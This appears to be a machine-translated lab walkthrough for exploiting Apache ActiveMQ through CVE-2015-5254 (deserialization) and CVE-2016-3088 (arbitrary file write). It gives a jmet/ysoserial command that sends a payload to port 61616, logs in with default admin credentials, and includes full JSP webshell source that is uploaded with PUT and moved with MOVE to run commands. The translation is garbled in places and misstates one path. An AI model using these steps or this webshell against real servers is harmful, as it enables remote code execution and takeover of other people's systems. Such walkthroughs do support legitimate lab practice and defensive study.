One 、 summary

Apache ActiveMQ yes Apache Open source message middleware developed by software foundation ; because ActiveMQ It's pure. Java Program , Therefore, only the operating system support is needed Java virtual machine ,ActiveMQ It can be carried out .

After the environment runs , Will open two ports ,61616 and 8161
among 61616 It's the work port , Messages are delivered on this port ,8161 Is the port of the network management page , visit ip:8161 You can see the network management page .

One CVE-2015-5254ActiveMQ Deserialization vulnerability

Vulnerability Details ：
Apache ActiveMQ 5.13.0 Before 5.x There is a security vulnerability in the version , The flaw lies in the fact that the program does not limit the classes that can be serialized in the agent . Remote attackers can use specially serialized Java Message Service(JMS)ObjectMessage Object uses this vulnerability to execute arbitrary code
1. Upload files
Use ysoserial Construct the serialization object of the executable command
As a message , Send to 61616 port
visit web page , view message , Trigger vulnerability
download jmet Of jar file ,Jmet The principle is to use ysoserial Generate payload And send the （ Its jar Inborn ysoserial, No need to download by yourself ）, So we need to be able to ysoserial yes gadget Choose one of the available , such as ROME
Execute the following command

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch
/tmp/success” -Yp ROME 192.168.4.10 61616

At this time, it has been uploaded to web Manage Pages , We have access to
http://yourip:8161/admin/browse.jsp?JMSDestination=event
To view messages

Click to view this message , Trigger vulnerability . Look in the container /tem/success Exploit successfully

Two 、CVE-2016-3088Activemq Arbitrary file write vulnerability

First visit ip:8161/admin Log in account number ：admin password ：admin
visit ip:8161/fileserver Carry out the bag , Use PUT Method , take webshell Upload to fileserver Under the table of contents

jsp The content is ：

<%@ page import=“java.io.*”%> <% out.print(“Hello”); String
strcmd=request.getParameter(“cmd”); String line=null; Process
p=Runtime.getRuntime().exec(strcmd); BufferedReader br=new
BufferedReader(new InputStreamReader(p.getInputStream()));

while((line=br.readLine())!=null){ out.print(line+“”); } %>

visit jsp page

Failed to parse , yes fileserver Insufficient permissions under the directory , visit ip:8161//admin/test/systemProperties.jsp, see Activemq The absolute path of

Wait until his absolute path , visit /fileserver/4.jsp, Carry out the bag , utilize MOVE The way to 4.jsp Move to opt Under the table of contents

After moving , visit /api/4.jsp?cmd=whoami Command executed successfully